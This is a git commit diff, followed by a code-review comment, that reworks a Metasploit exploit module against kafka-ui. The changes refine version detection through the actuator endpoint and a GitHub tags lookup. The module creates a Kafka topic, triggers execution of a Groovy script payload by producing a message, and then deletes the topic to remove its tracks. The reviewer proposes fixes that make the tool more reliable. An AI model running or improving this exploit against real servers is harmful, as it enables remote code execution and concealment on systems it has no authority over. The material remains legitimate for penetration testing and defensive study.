Second release of module
This commit is contained in:
parent
3db32da70f
commit
d5f30befbb
@ -76,17 +76,55 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def vuln_version?
|
||||
@version = ''
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'ctype' => 'application/json',
|
||||
'uri' => normalize_uri(target_uri.path, 'api', 'info')
|
||||
'uri' => normalize_uri(target_uri.path, 'actuator', 'info')
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('build')
|
||||
if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))
|
||||
res_json = res.get_json_document
|
||||
unless res_json.blank?
|
||||
@version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x
|
||||
if res.body.include?('build')
|
||||
@version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x
|
||||
elsif res.body.include?('git')
|
||||
# determine version by using git commit id by querying api.github.com/repos/provectus/kafka-ui/tags.
|
||||
git_commit_id = res_json['git']['commit']['id']
|
||||
# git commit id 38c4cf7 is for whatever reason not listed when quering api.github.com, so we handle this manually
|
||||
if git_commit_id == '38c4cf7'
|
||||
@version = '0.3.3'
|
||||
else
|
||||
# !!! overwriting datastore options is not neat, but I frankly do not know how to do this nicely.
|
||||
# !!! suggestions are welcome ;-)
|
||||
rhost = datastore['RHOSTS']
|
||||
rport = datastore['RPORT']
|
||||
ssl = datastore['SSL']
|
||||
datastore['RHOSTS'] = 'api.github.com'
|
||||
datastore['RPORT'] = 443
|
||||
datastore['SSL'] = true
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'ctype' => 'application/json',
|
||||
'uri' => normalize_uri(target_uri.path, 'repos', 'provectus', 'kafka-ui', 'tags')
|
||||
})
|
||||
datastore['RHOSTS'] = rhost
|
||||
datastore['RPORT'] = rport
|
||||
datastore['SSL'] = ssl
|
||||
if res && res.code == 200
|
||||
res_json = res.get_json_document
|
||||
unless res_json.blank?
|
||||
# loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil
|
||||
res_json.each do |tag|
|
||||
if tag['commit']['sha'][0, 7] == git_commit_id
|
||||
@version = tag['name'].delete_prefix('v')
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)
|
||||
end
|
||||
false
|
||||
|
@ -117,6 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
post_data = {
|
||||
name: topic_name.to_s,
|
||||
partitions: 1,
|
||||
replicationFactor: 1,
|
||||
configs:
|
||||
{
|
||||
'cleanup.policy': 'delete',
|
||||
|
@ -192,24 +231,31 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
print_status("Checking if #{peer} can be exploited.")
|
||||
return CheckCode::Vulnerable("Kafka-ui version: #{@version}") if vuln_version?
|
||||
return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?
|
||||
|
||||
unless @version.blank?
|
||||
if @version.match(/\d\.\d\.\d/)
|
||||
return CheckCode::Safe("Kafka-ui version: #{@version}")
|
||||
else
|
||||
return CheckCode::Detected("Kafka-ui unknown version: #{@version}")
|
||||
end
|
||||
end
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
|
||||
print_status('Searching for active Kafka cluster...')
|
||||
vprint_status('Searching for active Kafka cluster...')
|
||||
@cluster = get_cluster
|
||||
fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?
|
||||
print_good("Active Kafka cluster found: #{@cluster}")
|
||||
vprint_good("Active Kafka cluster found: #{@cluster}")
|
||||
|
||||
print_status('Creating a new topic...')
|
||||
vprint_status('Creating a new topic...')
|
||||
@new_topic = create_topic(@cluster)
|
||||
fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?
|
||||
print_good("New topic created: #{@new_topic}")
|
||||
vprint_good("New topic created: #{@new_topic}")
|
||||
|
||||
print_status('Trigger Groovy script payload execution by creating a message...')
|
||||
vprint_status('Trigger Groovy script payload execution by creating a message...')
|
||||
fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)
|
||||
|
||||
case target['Type']
|
||||
|
@ -222,11 +268,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# cleaning up the mess and remove new created topic
|
||||
print_status('Removing tracks...')
|
||||
vprint_status('Removing tracks...')
|
||||
if delete_topic(@cluster, @new_topic)
|
||||
print_good("Successfully deleted topic #{@new_topic}.")
|
||||
vprint_good("Successfully deleted topic #{@new_topic}.")
|
||||
else
|
||||
print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")
|
||||
vprint_error("Could not delete topic #{@new_topic}. Manually cleaning required.")
|
||||
end
|
||||
end
|
||||
end
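Review bot: The GitHub lookup in vuln_version? rewrites datastore['RHOSTS'], 'RPORT' and 'SSL' and restores them only on the normal path, so a Rex::ConnectionError or timeout raised by that send_request_cgi leaves the module pointed at api.github.com for the rest of the session, and the request URI is built with `normalize_uri(target_uri.path, 'repos', ...)`, which prepends the target's TARGETURI to the GitHub API path. send_request_cgi accepts per-request 'rhost', 'rport', 'ssl' and 'vhost' keys that HttpClient#connect honors (worth confirming against the framework version in use), which removes the datastore juggling entirely; if the datastore approach is kept, the three restores must move into an `ensure` block. Either way the version check now depends on outbound internet access and GitHub's unauthenticated rate limit: a 403 leaves @version empty, and the check hunk then returns CheckCode::Safe from the blank-@version fallthrough, which also fires when the target never answered at all, where CheckCode::Unknown fits better. res_json['build']['version'] and res_json['git']['commit']['id'] are also indexed without guards, so a body that merely contains the substring 'build' or 'git' raises NoMethodError instead of returning false; `res_json.dig('build', 'version')` and `res_json.dig('git', 'commit', 'id')` with a nil check keep that path safe.
```ruby
# … unchanged: 38c4cf7 special case …
else
  # Per-request overrides keep RHOSTS/RPORT/SSL untouched, and the GitHub
  # API path must not inherit TARGETURI.
  res = send_request_cgi({
    'method' => 'GET',
    'ctype' => 'application/json',
    'rhost' => 'api.github.com',
    'rport' => 443,
    'ssl' => true,
    'vhost' => 'api.github.com',
    'uri' => normalize_uri('repos', 'provectus', 'kafka-ui', 'tags')
  })
  # … unchanged: tag loop matching git_commit_id …
end
```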
|
||||